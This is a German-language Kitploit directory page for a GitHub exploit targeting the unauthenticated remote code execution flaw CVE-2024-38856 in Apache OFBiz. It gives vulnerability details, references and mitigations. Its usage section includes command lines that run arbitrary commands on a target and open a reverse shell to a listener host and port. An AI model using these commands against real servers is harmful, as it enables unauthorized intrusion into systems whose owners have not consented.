Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Apache-OFBiz-Exploit — Exploit für Apache OFBiz - CVE-2024-38856 | Kitploit
Tools/GitHubGitHub/alissonfaoli/apache-ofbiz-exploit
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungRemote-Access-Tool
GitHubalissonfaoli/apache-ofbiz-exploit

Apache-OFBiz-Exploit

Exploit für Apache OFBiz - CVE-2024-38856

Repository anzeigen
11vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Apache-OFBiz-Exploit

Exploit für Apache OFBiz (CVE-2024-38856) Von: Alisson Faoli

Beschreibung

Dieses Repository enthält einen Exploit für die Schwachstelle CVE-2024-38856 in Apache OFBiz. Der Fehler ermöglicht eine nicht authentifizierte Remote Code Execution (RCE).

Hinweis: Dieser Exploit dient ausschließlich Bildungs- und Forschungszwecken. Missbrauch kann illegal sein und liegt in der alleinigen Verantwortung des Benutzers.

Details zur Schwachstelle

CVE: CVE-2024-38856

Betroffene Software: Apache OFBiz bis Version 18.12.14

Schwachstellentyp: RCE

Ausnutzung: Keine Authentifizierung erforderlich

Referenzen:

  • https://www.zscaler.com/blogs/security-research/cve-2024-38856-pre-auth-rce-vulnerability-apache-ofbiz
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-38856
  • https://www.cyfirma.com/research/cve-2024-38856-pre-authentication-remote-code-execution-rce-vulnerability-analysis-and-exploitation/

Verwendung

Repository klonen:

root@kitploit:~
git clone https://github.com/AlissonFaoli/Apache-OFBiz-Exploit.git
cd Apache-OFBiz-Exploit

Abhängigkeiten installieren:

root@kitploit:~
pip install -r requirements.txt

Exploit ausführen:

RCE: python3 CVE-2024-38856.py cmd -t https://10.150.10.200:8443 "whoami"

SHELL: python3 CVE-2024-38856.py shell -t https://10.150.10.200:8443 -l 10.150.10.123 -p 4444

Gegenmaßnahmen

Um diese Schwachstelle zu beheben, wird Apache-OFBiz-Administratoren empfohlen: Auf die gepatchte Version unter https://ofbiz.apache.org/download.html zu aktualisieren. Firewall- oder WAF-Regeln anzuwenden, um bekannte Exploit-Versuche zu blockieren.

Kontakt

Bei Fragen oder Verbesserungsvorschlägen zum Exploit kontaktieren Sie mich: LinkedIn: https://linkedin.com/in/alisson-faoli/

Rechtlicher Hinweis:

Dieser Code wird ausschließlich zu Bildungszwecken und für Sicherheitstests in autorisierten Umgebungen bereitgestellt. Der Autor übernimmt keine Verantwortung für Missbrauch.

Tool herunterladen